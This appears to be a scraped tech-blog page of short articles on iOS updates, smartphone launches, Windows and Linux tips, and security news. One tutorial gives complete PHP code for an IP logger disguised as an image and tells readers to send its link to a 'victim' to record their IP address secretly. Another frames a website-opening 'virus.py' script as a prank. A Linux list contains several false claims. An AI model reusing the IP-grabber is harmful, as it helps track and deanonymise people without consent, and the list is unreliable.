How to Install the Apple iOS 7.0.6 Security Update

Late last Friday, Apple released iOS 7.0.6, a software patch designed to fix a problem with how iOS 7 validates SSL certificates. If your iPhone, iPad, or iPod touch is running iOS 7, you've probably seen the red alert affixed to the Settings icon—do not ignore it!

Certificate validation plays an extremely important role in establishing secure sessions, as this is how a site or device verifies that the information is coming from a trusted source. By validating the certificate, Gmail, Facebook, and online backing sites know that the request is coming from you, and is not a spoofed attacker request.



Those with malicious intent can use the exploit to eavesdrop on your iPhone, iPad, and iPod touch activity. Security experts who are familiar with these types of "middlemen" breaches have stated that those with ill will can read (and possibly modify!) what would normally be secure messages. You do not want that.

Immediately secure your mobile device by downloading iOS 7.0.6, which is available for iPhone 4 (and later), 5th-generation iPod touch, and iPad 2 (and later). Here's how to do it.

1.Tap "Settings."
2. Once you're inside the Settings area, tap "Software Update."
3. You'll see the iOS 7.0.6 update information that lists the size of the download (16.6MB) and what it repairs (SSL verification). Click "Download and Install" to continue.
4. A "Terms and Conditions" window opens. After reading it (or completely glossing over it), tap "Agree" to begin the download.
5. Roughly three minutes later—BAM!—the software download is complete.
Your iPad will auto-reboot to install the update. Please remember to keep your operating system up to date.
Read More

Leaked Images show HTC’s M8 Having A Dual-Lens Camera.

Images of HTC’s upcoming M8 smartphone have been leaked and it looks as though the handset will feature a dual-lens camera. But what does that mean? Well let’s look at some of the benefits of having one camera with two seperate lenses.

The start-up company Corephotonics has developed its own dual-lens camera and hopes that smartphone companies will adopt the idea for use in new handsets. Looking at the way it works will give us a better idea of what HTC has in mind.



The two lenses have two different focus lengths, one being a wide-angle and the other set at 3x zoom. Practically this means that you can magnify subjects in the distance without having to use digital zoom. When tested next to a traditional smartphone camera, the Corephotonics dual-lens camera outputted a sharp 13-megapixel image at both 1x zoom and 3x zoom.

The Corephotonics system also produces smooth zooms thanks to a mix of digital zoom and len-switching, which is a big plus during video recording.

Another benefit to having two lenses is that images are of good quality even in low-light conditions. The software matches each pixel from one lens with the corresponding pixel from the other lens, all in real time. It is able to detect which of the pixels is likely the most accurate by using scene analysis, resulting in a sharper picture and reduced noise.

Two lenses also allows an amount of depth analysis, which means gaining more control over images. So for example, it is possible to automatically blur out backgrounds in portrait photos and autofocus more quickly.

Corephotonics has admitted that it is not behind the dual-lens camera that HTC are planning to use in the M8, suggesting that the camera is coming either from another source or even from HTC itself. The technology is certainly interesting and will likely add another dimension to the smartphone camera.
Read More

Facebook Has Acquired WhatsApp – Is This Good or Bad?


Facebook has just acquired WhatsApp in a multi-billion dollar move. This isn’t the first time the social networking giant has made such a move. What does it mean for us, though? Is it a good or bad move in terms of how it will affect our use of Facebook and WhatsApp?

Facebook spent $19 billion buying WhatsApp. With such a high price tag, Facebook has to believe the company is valuable to them. WhatsApp is a mobile messaging service, yet Facebook users know that it already offers messaging. It seems Facebook saw something in WhatsApp that they knew would make their service better. There’s no mention yet how Facebook plans to use the mobile messaging service, but they’ve made similar acquisitions before with great results and no change to their own services or to the acquired service. Instagram comes to mind instantly. After that acquisition for one billions dollars, our time on Facebook was not affected and neither was our use of Instagram.

The WhatsApp acquisition, though, appears to be Facebook’s most expensive acquisition yet. Will it be a smooth transition like Instagram? Or will this big move somehow affect both our use of Facebook as well as WhatsApp?

Is Facebook acquiring WhatsApp good or bad in terms of what it means for users?

Read More

How to Create a Windows 8.1 USB Installer


The use of DVD drives has been declining, as most programs can be downloaded via the Internet and don’t require an installation disc. I recently built a new PC and didn’t even include a DVD drive in my build – all of my programs and games can be installed via the Internet. But I ran into this tricky problem: how do I install Windows without a DVD drive?

The solution was simpler than I thought. I install the operating system using a Windows 8 installer USB drive. In today’s post I will explain the painless process I took to create the Windows 8.1 USB installer and how I installed it on my machine. All you need is a computer running Windows and a 4GB flash drive.

Format the Flash Drive

First, you need a formatted USB drive with at least 4GB of available space.

1. Connect the USB drive to the computer.

2. Right-click its drive letter and select “Format” from the options.

3. In the Format window, make sure that “FAT 32″ is the selected file system. Everything else can be left as it is.


4. Click start. Once the format is complete, you can proceed to create the Windows 8 installer.
Create the Windows 8.1 Installer USB Drive

Next, you will need to download the Windows 8.1 installer and load it onto the formatted flash drive.

1. Go to Microsoft’s Windows 8 Upgrade Page.

2. Scroll down and click the “Install Windows 8.1″ button. This will begin downloading “WindowsSetupBox.exe”.


3. Run “WindowsSetupBox.exe” when the download finishes. If it asks for a License number, input your original key (if you try this on Windows 8, it may skip the step prompting for a License key). It will begin downloading Windows 8 and get the files ready. This process may take a few minutes to finish.

4. The installer will ask you how you would like to install Windows 8.1. Select “Install by creating media.”


5. When it asks you to choose which media to use, select “USB flash drive.”


6. Select the formatted removable drive from the list. Accept any prompts to erase the contents of the USB drive.

Install Windows 8.1

Finally, it is time to install Windows 8.1 on your new machine.

1. Plug the USB drive into the computer you want to install Windows 8.1 on.

2. You need to tell the computer on first start to boot from USB and not from hard drive or another location. This is done in the BIOS (You usually enter the Bios with F1, F1, Delete, Esc or another key that is highlighted on the screen when it first boots up).

3. Look for any entry that says “Boot” or “Boot Order” and make sure that USB has the highest priority on the system (remember, you can easily repeat the steps if the computer is not booting from USB).

4. The computer should pick up the installation files on the USB drive automatically and installation should commence.
Read More

Firefox Phones Will be launched for $25 (~₹1550) in Developing Countries


If there’s one thing most all  know all too well by now, it’s this: smartphones are not cheap. And while they’re not cheap, there’s a reason most of us have them – and that’s because they’ve basically become an extension of ourselves. We do everything with our smartphones. They’re our video game consoles, our cameras, our mini-computers, and our lifeline to the rest of the world.

But sadly, not everyone can afford a smartphone. Some people can’t even afford a phone. You see, we’re used to paying high-dollar amounts both for smartphones and the data plans that come shackled to them – but a lot of people, in a lot of under-developed places around the world, can only imagine what it’s like to have a smartphone at their beck and call. All too aware of this issue, the folks at Mozilla are trying to do something about it and would like to level the playing field a little bit. That’s why they’re developing a $25 (~₹1550 (India))  Firefox smartphone for individuals in under-developed countries.  

Could This Be The Start Of A New Positive Trend?
Mozilla will be working with Spreadtrum Communications to make this low-end smartphone a very real possibility for people in the world who otherwise wouldn’t have the ability to own their own smartphone.
It probably goes without saying, but these Firefox phones obviously won’t be top of the line models. They will do basic things, like surf the web, etc., but they won’t be comparable to high-end models from companies such as Samsung and Apple. One of the main ways they’ll differ from other smartphones is in their size – they will be significantly smaller. I don’t say those things to be discouraging; I applaud Mozilla in that they have found a way to provide cheaper phones to a group of people around the world who can really benefit from them.
Read More

Windows Phone 8.1 Can Be Added To Existing Android Devices

Windows Phone 8.1 adding support for Snapdragon 200, 400 and 400 LTE Android handsets is only for OEMs. I mistakenly assumed that Microsoft would be releasing Windows Phone 8.1 to consumers to flash to their own devices.

Original story below:
Windows Phone, like iOS, is only available on select hardware. While Microsoft has licensed out Windows Phone to third-party OEMs, they have had to stick with restrictive hardware designs. With Windows 8.1, it’s getting a little less restrictive.
At Mobile World Congress, Microsoft announced that Windows 8.1 will support more hardware in the future. That means Android device manufacturers can load Windows Phone 8.1 onto their devices without having to change the hardware. Along with the announcement, Microsoft stated that it has added support for devices sporting Qualcomm’s Snapdragon 200, 400 and 400 LTE chipsets.
Unfortunately, it looks like Microsoft doesn’t want you to have your cake and eat it too. It confirmed that dual-booting won’t be allowed so OEMs won’t be able to offer devices with both Android and Windows Phone. It’s a little unfortunate, but also understandable from Microsoft’s perspective as they hope those who try it out will want to stick with it.
With this news, it’s pretty obvious that Microsoft will be aggressively targeting Android users this year. Not only is it opening the Windows Phone platform to existing Android device manufacturers, but it’s also trying to bring Android users to Windows Phone through its new Nokia X platform.
Nokia X is a new line of smartphones that run a forked version of Android that strips out all things Google and adds Microsoft and Nokia services. It’s basically a version of Android that looks an awful lot like a Windows Phone and it’s intended for emerging markets.
As Microsoft continues to do well with Windows Phone in emerging markets, Nokia X and Windows Phone 8.1 may just help it steal some thunder away from Android. It probably won’t be much, but it’s growth and that’s all that really matters to Microsoft at this point.
Read More

A New Record? Goophone Clones Galaxy S5 in TWO Days!


Goophone has come out in support of those who can’t afford the newly launched Samsung Galaxy S5 – by cloning the device in just 2 days and naming it, imaginatively, the Goophone S5.
The Goophone S5 will pack a 5-inch 1920×1080 display and will be powered by a MediaTek octa-core chipset clocked at 2GHz. It will come with 2GB of RAM, 32GB of onboard storage, WiFi, dual-SIM capabilities, a 2,800mAh battery, a 13MP rear-facing camera, a 5MP front-facing camera, and will be priced at $300.

The Samsung Galaxy S5 on the other hand, features a 5.1 inch Super AMOLED Full HD display with a resolution of 1920 x 1080 pixels. The Galaxy S5 is powered by a 2.5 Ghz Snapdragon 800 processor and runs on Android 4.4 KitKat. This latest flagship from Samsung is packed with a 2 GB of RAM and 16/32 GB internal storage options along with expandability of 64 GB via MicroSD card.
The knockoff S5 obviously contains the “Goophone” branding on the rear shell, but that appears to be the only design element that differentiates the two pieces of kit. 
The Goophone S5 will compliment the company’s line of familiar looking offerings, like the Goophone i5S,Goophone i5C, Goophone N3 and the Goophone Smart Watch.
We’re not sure if Samsung will be taking any legal action against Goophone and their blatant and very obvious Galaxy S5 ripoff. The official site for the product is currently showing as “out of stock“.

Read More

Toshiba's 128GB USB drive flashes its private partitions

Toshiba has launched a new high-capacity and high-speed USB 3.0 flash drive that lets you create public and private partitions to keep prying eyes and hands away from your secret files.




The TransMemory Pro also comes with built-in security software and encrypted password protection. Available in 64GB or 128GB sizes, it matches the recently unveiled 128GB memory card by SanDisk for capacity.

The storage device not only touts large capacities, but offers high data transfer speeds too. Read speeds of up to 222MB/s are possible, with write speeds coming in at up to 205MB/s.

The drive is compatible with PCs or Apple Mac computers. It's plug-and-play, meaning no driver or software setup is required.

Business potential

These enhancements make it a viable portable storage device for business use, with Toshiba citing executives, sales professionals, photographers and advanced users as its target audience.

The drive features a durable frame and also comes with a five year standard limited warranty.

The 64GB model retails for $129.99 (£78, AU$145), while the 128GB model goes for $199.99 (£120, AU$222). Both are available now.
Read More

Launch of Bitdefender Mobile Security for Android provides theft and privacy protection to users

Lightning-fast protection from the cloud with a nimble new interface
 
 Bitdefender®, the creator of the world's most effective antivirus solutions, has announced the launch of the new Bitdefender Mobile Security for Android, fortified with smart anti-theft capabilities, enhanced privacy protection and a sleek new interface.

The announcement comes after a recent Bitdefender study of 836,021 free Android apps revealed that 35% of these can access user locations, while almost 3% can leak e-mail addresses, 5% can locate and open photos on users' phones and 10% can read contact lists.

Awarded for best malware detection and usability by independent security testers, the new Bitdefender Mobile Security for Android uses cloud-based technology to warn device owners of malicious websites, phishing and fraud while helping users find, wipe or lock missing devices easier and faster. Privacy Advisor points out intrusive apps that collect sensitive data such as browsing history, bookmarks, contacts lists, messages and calendar entries or that view saved photos.

"Modern mobile phones are less of a phone and more of a mobile computer and the unchecked use of apps can pose a serious risk to the owner's privacy," states Catalin Cosoi, Chief Security Strategist at Bitdefender. "Once data is accessed, the phone's owner has no control over who sees it and how it is used."

Bitdefender Mobile Security for Android also indicates which applications use billable device functions, including making phone calls or sending text messages, helping users make informed decisions about privacy and data security.

Bitdefender Mobile Security for Android is now available for download at https://play.google.com/store/apps/details?id=com.bitdefender.security and can be tested for free for 14 days.

For a full list of Bitdefender 2014 features and benefits by product, please visit http://www.bitdefender.co.uk or follow Bitdefender on Twitter for daily malware alerts.

About Bitdefender®

Bitdefender is the creator of one of the world's fastest and most effective lines of internationally certified internet security software. The company is an industry pioneer, introducing and developing award-winning protection since 2001. Today, Bitdefender technology secures the digital experience of around 400 million home and corporate users across the globe.

Recently, Bitdefender won a series of important awards and accolades in the global security industry, including "Product of the Year" by AV-Comparatives, "Best Repair 2012" by AV-Test, "Editor's Choice" and "The Best Antivirus for 2013" by PC Mag, that confirmed the antivirus software's leadership status among security products.

More information about Bitdefender's products is available from the company's security press room. Additionally, Bitdefender publishes the HOTforSecurity blog, where readers can find stories from the underworld of internet fraud, scams, malicious software - and gossip.
Read More

30 Big Companies and Devices Running on GNU/Linux

Here in this article we would be discussing some of those Linux powered devices and company running them.

1. Google

Google, an American based multinational company, the services of which includes search, cloud computing and online advertising technologies runs on Linux.

2. Twitter

Twitter, famous online social networking and micro-blogging site that is Powered by nix.

3. Facebook

Facebook, one of the most famous and most widely used Social Networking service runs on the same platform.

4. Amazon

An American based international company which deals with International Online Retailing is in the list of Linux powered Company.

5. IBM

IBM (International Business Machine Corporation) the American based company which for sure don’t requires any introduction, is again powered by nix.

6. McDonalds

The world’s largest chain of hamburger fast foot restaurant uses GNU/Linux (Ubuntu) too.

7. Submarines

The submarines in the United State Navy are controlled by same platform.

8. NASA

National Aeronautical and Space Administration, The United nation’s Space program widely uses Linux in many of their programmes.

9. Watches

Most of you would not be knowing that there are Linux Powered Watches in the market, already. The watch developed by IBM running Linux.

10. Mobile Devices

True, you all know that Linux is powering Mobile Phones, Tablets and Kindle. If the news is true, Nokia is all set to come with its First Android based Mobile (Though the decision of Nokia is too late and Nokia has paid for this and still paying).

11. Space

A Specific Linux Distro (Debian) is already in the space. Debian led all the rest.

12. Raspberry pi

The business card sized computer designed for electronic projects as well as desktop computing which is very cheap in cost and is fully functional. Raspberry is a landmark in Linux Development.

13. Desktop Computing

Though a little late, Linux made a notable presence in the desktop computing market. In school and academics as well as in government offices Linux are being widely used, these days.

14. Corporates

The corporate offices are using Linux and finds it more productive than any other alternatives.

15. New York Stock Exchange

New York Stock Exchange (NYSC) which provides means for buyers and sellers in order to trade shares of stock in companies registered for public trading relies solely on Linux.

16. Traffic Controlling

The Traffic controlling system in most of the countries be it Road Traffic or Air Traffic Linux proved to be the best than any other available alternative.

17. Nuclear Projects

When it comes to Nuclear Ambitious projects, Linux is the best option. One of such OS is QNX, which lately is acquired by Blackberry Ltd.

18. Bullet Trains

The Bullet Trains in Japan runs at the speed of 240-320 km/h. All train tracking, maintenance, scheduling and controlling is Linux based.

19. Tianhe-2

The fastest Supercomputer of the world, China’s Tianhe-2, which is capable of performing 33.86 petaflops operations per second is running Kylinos, a Linux based Operating System.

20. Internet Hosting

More than 70% of Internet Hosting and service providers are Linux based. Thought this statistic is difficult to figure out but based upon the Linux compatible hardware sold, and demand for cross platform compatible hardware, the above statistics is a rough estimation.

21. Missiles and Weapons

The Missiles and destructive weapons of next generation is themed to be much advanced and Intelligent system than its predecessors. Well what else would have been its alternative.

22. Hackers

Hackers be it ethical or non-ethical prefers Linux over any other Platform. The availability of a variety of tools, the architecture, the security, the technique to handle things intelligently and control everything to the point required makes it perfect choice for Hackers.

23. Other Industries

The Wikipedia, PIZZA Hut, Aviation industry, Parliaments of countries like France are using Linux. When it comes to work in distributed system, multi-user supported system, the only thing that comes to mind is the Nix.
The OLX and Just dial have their user base just because of Linux. The service providers relied on Linux for developing Application that has a huge database and act as local google and Amazon.

24. Postal Services

The US Postal Services and banking sector of most of the countries are using Linux. Well USA uses Linux not only as mission critical application, but have tried building their system around. The use of nix in US Postal Service is a brilliant Example.

25. Education

Schools, colleges and Universities in Russia, Germany, Philippines, Georgia, Switzerland, Italy, India specially Tamil Nadu are using Linux even for basic computer education.
The availability of specific Linux distro for every task makes Linux the most sought after platform. Edubuntu is a distro specially developed for computer LABS from educational point of view. (At my time RedHat was used for educational purpose, when I was pursuing my major in Computer Application.)

26. Movies

For those who think Linux is not for Graphical editing we need to mention that Oscar winning Titanic and Avatar were Edited and Graphics were created using Linux only. Moreover the video cameras these days are Linux centred.

28. Networking

Cisco, the networking and routing gaint are completely Linux Based. Real-Time Communication and Integration Solutions providing company finds Linux best suited to their Application Development and Delivery.

29. Cars

Recently, cars developed around Linux was exhibited. Making cars more intelligent which can work in odd situations, nix is the best choice.

30. Future of ROBOTICS

Again an intelligent critical application, which should work in odd situations and act accordingly, specially when robotics is supposed to be tied with army and security and there remains no place for any flaws, Linux and Only Linux………
Actually the list is ever growing. That’s all for now. I’ll be here again with an interesting article soon. Till then stay tuned and connected. Give your valuable feedback in comment section.
Read More

How To Grab Someone IP Address ?

In this tutorial i will you show you how to grab someone IP address using PHP script.This method can be used to grab someone Ip address on yahoo or Facebook chat or by sending mail to victim. So Lets get started.


How To Hack Someone Ip Address ?

1. Copy the below codes into Notepad and save it as Grab.php (.php is must) 
<?php
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$img_number = imagecreate(400,95);
$backcolor = imagecolorallocate($img_number,10,102,153);
$textcolor = imagecolorallocate($img_number,255,255,255);

imagefill($img_number,0,0,$backcolor);
$number0 = " This is Your IP/Proxy";
$number1 = " IP: $_SERVER[HTTP_X_FORWARDED_FOR]";
$number2 = " Host/Proxy: $hostname";
$number4 = " _________________________________";

Imagestring($img_number,10,5,5,$number0,$textcolor);
Imagestring($img_number,10,5,25,$number1,$textcolor);
Imagestring($img_number,10,5,45,$number2,$textcolor);
Imagestring($img_number,10,5,50,$number4,$textcolor);
Imagestring($img_number,10,8,50,$number4,$textcolor);
Imagestring($img_number,10,5,10,$number4,$textcolor);
Imagestring($img_number,10,8,10,$number4,$textcolor);

header("Content-type: image/png");
imagepng($img_number);
$file=fopen("Name-here-to-protect-the-File.txt","a");
$file2 = "- IP joined - IP/Proxy: $_SERVER[HTTP_X_FORWARDED_FOR] - Host: $hostname - '\n' ";
fwrite($file, $file2);
fclose($file);
?>
    2. Now make Free account on any of  the free web hosting sites Ripway or on  My3gb .
    3. Now Upload Grab.php to your web hosting site.
    4. Copy the link of your  uploaded file and send it to victim.
    5. As soon as victim will click on your link his ip will be saved in your free web hosting site.
    6. Enjoy you are Done !!

Read More

Opening Number Of Websites Using Python


So you just started in python programming, and want to prank your friends. Here i will teach you how to open any website on his computer using python.

Before you begin download and install python from Here <- Click me!

Step 1:
open notepad and type

import webbrowser

In python the "import" statement is used to add a module to your project. In this case we want to add the webbrowser module.

Step 2:
webbrowser.open('http://SITE HERE!.com')

This is calling the open function on your default web browser. You pass it an url in the form of a string.

Possible usages:
You can add as many websites as you want like show below

webbrowser.open('http://coolhackingtrick.com')
webbrowser.open('http://google.com')
url = "http://coolhackingtrick.com";
webbrowser.open(url)

The complete code will look something like below
import webbrowser
webbrowser.open('http://coolhackingtrick.com')
webbrowser.open('http://google.com')
webbrowser.open('http://yahoo.com')
webbrowser.open('http://facebook.com')

Step 3

Save the file as virus.py
Enjoy pranking your friends!
Read More

Downloading Torrent Using Internet Download Manager (IDM)

 
How To Transfer Torrent With IDM

1. First download the torrent file with .torrent extension which you wish to download from the internet directly without any torrent client like utorrent.
 2. Now open zbigz.com and you will land on its homepage.
3. Then Click on upload Torrent and browse your torrent to transfer and click on Go.
4. Then it will ask you for Free or Premium service, choose Free to proceed further.
5. It will take some time to cache your file. Once the caching is done, click on transfer button to download your file as shown below.
6. You should have internet download manager installed on your computer so that download start inside IDM. If you don't have IDM don't worry it will download directly.

Note: 
  • Free Service limit of downloading torrent is upto 1GB
  • And the validity of the link will be 7 days.


Read More

Hands-on with Linux Mint Debian Edition 201403 release candidate

The last "rollup" release, with the latest Update Pack (UP6 at that time) included in the ISO images, was a year ago, LMDE 201303.
I am particularly pleased to see this release, and I have been been waiting for it anxiously, because there have been two major Update Packs (UP7 and UP8) since the last release, and it has gotten increasingly difficult to install LMDE from scratch and then add the latest updates.
The release notes for UP7 and UP8 each included several cautions about individual package updates which might break the Update Pack installation, and thus had to be installed separately first. So it is really nice to have a clean set of ISO images that can just be installed to get the latest version.
Of course, at this point it is only a 'release candidate', so unless you are desperate or adventurous, it is probably best to wait another week or two for the final release.
There is a lot of good news with this release, and one of the best things is that it is finally UEFI compatible.
Not only that - the news just keeps getting better - the Linux Mint developers have fixed the UEFI installation problem that appeared in the Mint 16 release, where it installed its EFI boot files in a directory named ubuntu, which meant that it was difficult to install Mint and Ubuntu on the same system. With this release they install again to a directory named linuxmint, so there is no conflict with Ubuntu.


Linux Mint Debian Edition Cinnamon Desktop

 The release announcement gives a very brief overview and includes the download links to mirrors all over the world.
This release is available with either the Cinnamon or MATE desktop, in 32-bit and 64-bit versions. There is good news for those who are concerned about compatibility with non-PAE CPUs: the 32-bit version of this release comes with a 486-compatible kernel by default. However, this has a negative impact for those who want to use 32-bit multi-core CPUs. The situation is described in detail in the Known Problems document.
This release comes with Linux Kernel 3.11.8 and of course the latest release of the two desktops, Cinnamon 2.0 and MATE 1.6, X.Org Server 1.14.3, Firefox 27.0, Thunderbird 24.3 and LibreOffice 4.1.3.2.
So far I have loaded it on four systems, two UEFI and two Legacy/BIOS/MBR:
- Acer Aspire One 725 (UEFI)
- HP Pavilion dm1-4310ez (UEFI)
- Lenovo T400 (BIOS/MBR)
- Samsung N150 Plus (BIOS/MBR)
The installation was absolutely routine with the exception of the well-known difficulty with UEFI firmware configuration on the HP Pavilion.There was even good news on that system, though, because the very difficult wi-fi adapter (Ralink 3290) seems to work just fine.
Every bit of hardware on every one of these four systems was supported, with drivers loaded automatically and everything working as it should. Graphic display and screen support was also good, ranging from the 10" (1024x600) display on the Samsung netbook to the dual monitors (1280x768 laptop and 1920x1080 external) on the Lenovo.

Read More

Samsung S5 is ready to launch in April

Samsung Announced Galaxy S5 with Finger Print Scanner & Heart rate Monitor. 
Specifications:

1. 5.1-inch Full HD Super AMOLED capacitive touchscreen 1080 x 1920 pixels Resolution at 432 ppi Gorilla Glass 3 Protection
2. water Proof up to 1 meter and 30 minutes and Finger print scanner, Heart Rate monitor
3. 16/32 GB Internal storage. Up to 128 GB Expandable
4. 2 GB RAM
5. Android 4.4 Kitkat
6. 16 MP camera With Advanced HDR with 4k 2160p at 30fps and 1080p at 60 fps.
7. 2 Mp Front camera With Full HD Recording at 30 fps
8. Quad-core 2.5 GHz Qualcomm Snapdragon 800 Processor
9. Adreno 330 GPU
10. 3G, LTE, NFC, Bluetooth v4.0, Dual Band WiFi, D-LNA, Infrared Port, A-GPS, USB 3.0
11. 2,800 mAh Battery
 The smartphone runs on Android 4.4.2 KitKat, the latest version of Google's mobile operating system. It is IP67 certified dust and water-resistant. The back panel of the phone sports a dimpled soft-touch cover, similar to the Nexus 7(2012) tablet.

In terms of connectivity options, the Galaxy S5 offers Wi-Fi 802.11 a/b/g/n and ac, Bluetooth 4.0, USB 3.0, NFC and InfraRed. The phone supports a large number of 4G LTE frequency bands with LTE Category 4 standard. It comes with accelerometer, gyro, proximity, compass, barometer, RGB ambient light, Gesture (IR), and heart rate sensors.

The phone packs in 2800mAh battery with a claimed standby time of 390 hours and talk time of 21 hours. It will be available in four different colours: charcoal black, shimmery white, electric blue and copper gold.

 
 
Read More

How To Solve - Windows Was Unable To Complete The Format


How To Fix Windows Was Unable To Complete The Format | Some Easy Steps

Unable to format a SD Card or a PenDrive or any thing. Then use this simple steps and you can format and open your memory card, pendrive and every thing.



1st Method :
1. Go to desktop and right click on my computer.
2. Select Manage from the menu.
3. Then goto disk management from the options.
4. After that select the flash drive from the clicked window.
 5. And then format your flash drive with the option you got from there.


2nd Method :
1. Login as an administrator powered user and go to "Command prompt".
2. Now type - format g: /q /fs:fat32 - and press Enter
If Your Flash Drive Letter G: . If not Then Just Change g: From There with Your Flash Drive Letter.
3. If you want to format your pendrive then just replace fat32 with ntfs.

Example : format g: /q /fs:ntfs
If Your Flash Drive Letter G: . If not Then Just Change g: From There With Your Flash Drive Letter.

Read More

Why Should You Put Linux In Your Computer

Linux Has a Great Community

So the first reason that you should take in consideration when thinking to switch to Linux or not, is the great and warm community that Linux has. Computer geeks, creators and builders from all over the world contribute their energy to build better open source software, Linux distributions for everyone and for any kind of machine you can can name in planet earth and what it most important these guys work to find new efficient cheap solutions.

I am very sure that if you start using Linux you will feel a freedom that it was missing before and you had no idea that such thing existed.

Linux is freedom!

Someone writes blogs and Linux tutorials to help, someone writes shell scripts so others can use to make their life easier and some stay online on IRC channels to answer your questions about Linux.

If you have a problem with your Linux machine, chances are that it will be solved very fast. We will help you, they will help you, everybody in the Linux community is contributing in his/her own way.
Read More

Holographic Memory Device Created

A team of scientific researchers, in joint collaboration, from the University of California, Russian Academy of Science and Riverside Bourns College of Engineering, have demonstrated a new kind of holographic memory device, which could provide extraordinary data storage capacity.

 Picture of hologram from movie Star Wars
 The new type of memory device uses a collective oscillation of spins in magnetic materials, known as spin waves, instead of the optical beams. Spin waves are advantageous because spin wave devices are compatible with conventional electronic devices and may operate at a much shorter wavelength than traditional optical devices, therefore allowing for smaller electronic devices that will have superior storage capacities.  The experimental results obtained by the researchers, show it is possible to apply holographic techniques, usually developed in optics, to magnetic structures to produce something called a magnonic holographic memory device. This research combines the advantages of magnetic data storage with the wave-based information transfer.



Alexander Khitun, the lead researcher and a research professor at UC Riverside said, “The results open a new field of research, which may have tremendous impact on the development of new logic and memory devices,” said A paper, “Magnonic Holographic Memory.” (The three co-authors of the paper are: Frederick Gertz, a graduate student who works with Khitun at UC Riverside, and A. Kozhevnikov and Y. Filimonov, of the Russian Academy of Sciences).  The submitted paper that describes the findings, has been submitted for publication in the journal Applied Physics Letters. (A copy of the paper can be found here).
The experiments outlined in the paper were conducted using a 2-bit magnonic holographic memory prototype device. A pair of magnets, which represent the memory elements, were aligned in different positions on the magnetic waveguides.  Spin waves propagating through the waveguides were affected by the magnetic field produced by the magnets. When spin waves interference was applied in the experiments, a clear picture was produced and the researchers could recognize the magnetic states of the magnets.  Khitun has been working for nearly a decade to develop a logic device that exploits spin waves. The majority of his initial research was focused on the improvement of spin wave-based logic circuits, like to the ones currently used in computers.
If this research continues, and I’m sure it will, the future applications of this technology are going to be huge, whether that be data storage devices for computers, or the means by which we communicate.  Now all we need is someone to market R2 units and we are half way to a galaxy far, far away.
Read More

Nokia announces the X, X+,XL its first Android phones



Nokia is officially launching its very first Android devices, known as the X and the X+, on stage at its annual Mobile World Congress press conference. It's incredible to see Nokia make such a huge foray into enemy territory. The X will have a 4-inch, 840 x 480 IPS screen, 512MB RAM, 4GB of storage expandable storage via microSD slot and 3-megapixel camera, while the X+ sports the same specs but more RAM (768 MB) and an included 4GB microSD card. You won't be getting Google's apps or Play store, however as both handsets will be based on the forked AOSP Android OS. Nokia says that'll have the advantages of the Android ecosystem, but with a "differentiated experience." So far, Here Maps, MixRadio, Skype and Outlook are being featured on the Nokia Store. You can access the Nokia and third party stores using the devices, but not Google Play, obviously. We've heard SwiftKey will be available on the Nokia X range (and for free, too), as will BBM, which is also coming to Windows Phone sometime "this summer."


The new devices are featuring a ported version of FastLane for Asha devices as a sort of skin, to give a similar experience as its other budget handsets. When you swipe across it, it'll bring up a sort of notification bar showing recently used apps, missed calls and texts and other activities. During the demo, Elop showed both the Nokia Store also Yandex, where he pulled down Aero Express, a Russian-flavored app. The X will be available immediately in growth markets (ie, not the US) and run 89 euros.

The X+, meanwhile, will run 99 euros but won't arrive until sometime in Q2 this year.


Read More

11 Things to Do After Buying a Domain Name

Buying your domain starts the path towards establishing your presence online. It should be the very first thing you do as your company name should be tied to it. Once you’ve bought your domain, then what?


It all depends on what you hope to accomplish with the domain. Using it to start a new business will take more steps vs. using it for mere lead generation or SEO.

11 things to do after buying a domain name

1. Secure matching social media names/URLs
Social media’s importance means availability of social media names may affect which domain you’ll want to get. Once you’ve decided on the domain, you’ll want to create your social media accounts immediately. Not having the matching social media names can cause lots of confusion and lose valuable connections.
Read More

KickStarter kicked by Hackers, username and password stolen


Online Crowdfunding website KickStarter is to be the latest high-profile website reporting security breach.  KickStarter became aware of the breach, after receiving a notification from Law enforcement.

Sponsored Links
Hackers breached their website( kickstarter.com) and gained access to the user's information including usernames, encrypted passwords, email IDs and phone numbers.  The company says there is No Credit card data compromised in this breach. 

Even though the password is encrypted one,  we aware the fact that attackers with enough computing power can easily crack those passwords.

The company informs that two accounts have been accessed by hackers so far.  All users are recommended to change their password immediately for the KickStarter website.

If you are using the same password in any other websites(most of us do), you are also advised to reset the password there also.

"We’re incredibly sorry that this happened. We set a very high bar for how we serve our community, and this incident is frustrating and upsetting." the company apologizes in their blog post.
Read More

Learn How to Hide WhatsApp 'Last seen at' Time and Profile Picture from Other Users

WhatsApp for Android added most awaited privacy option for all who do not want to display information about when they last used the app.


This is the first impressive update of the WhatsApp after acquisition by Facebook, who has paid a lot of money in cash and stock to acquire it.

The Popular Smartphone messaging application WhatsApp version 2.11.169 will provide you more ability and control over privacy options i.e. Hiding ‘last seen at’ time, Profile picture, status updates from others, which are currently visible for all WhatsApp users.
Read More

Android iBanking Trojan Source Code Leaked Online

Smartphone is the need of everyone today and so the first target of most of the Cyber Criminals. Malware authors are getting to know their market and are changing their way of operations. Since last year we have seen a rise in the number of hackers moving from the Blackhat into the Greyhat.

The Head of knowledge delivery and business development for RSA's FraudAction Group, Daniel Cohen warned users about the new threat via a company blog on Thursday, that explains everything about the malware app, called iBanking.


iBanking, a new mobile banking Trojan app which impersonates itself as an Android 'Security App', in order to deceive its victims, may intimidate a large number of users as now that its source code has been leaked online through an underground forum.

It will give an opportunity to a larger number of cybercriminals to launch attacks using this kind of ready-made mobile malware in the future.

Since many banking sites use two-factor authentication and transaction authorization systems in order to deal with the various threats, by sending unique one-time-use codes to their customers' registered phone numbers via SMS, but in order to defraud them, cyber criminals have started to create various mobile malware like iBanking to solve their purpose.

Read More

Linux Extends its Mobile Empire with Phones


Ubuntu, one of the most popular versions of the Linux open source operating system, is set to arrive on smartphones by the end of the year.
Today, Canonical — the company that develops Ubuntu — announced partnerships with Spanish hardware designer bq and the Chinese mobile device company Meizu, saying that both would introduce phones over the next 10 months. The news is part of wider movement towards Linux phones across the world and particularly in Asia, where the open source OS can feed the enormous market for inexpensive devices.

Read More

The Top 7 Best Linux Distros for 2014

Most Beautiful Distro: Bodhi
This is an easy choice: Bodhi Linux. Bodhi Linux uses the Enlightenment window manager, which has always occupied a unique niche. Enlightenment is beautiful, lightweight, and extremely customizable. Its flexibility has worked against it in the past, because when you install the stock Enlightenment it takes a fair bit of work to set it up as it's more of a framework than a finished desktop environment. The Bodhi team have done a great job of taming Enlightenment and giving users a beautiful, ready-to-use implementation.
Bohdi desktop
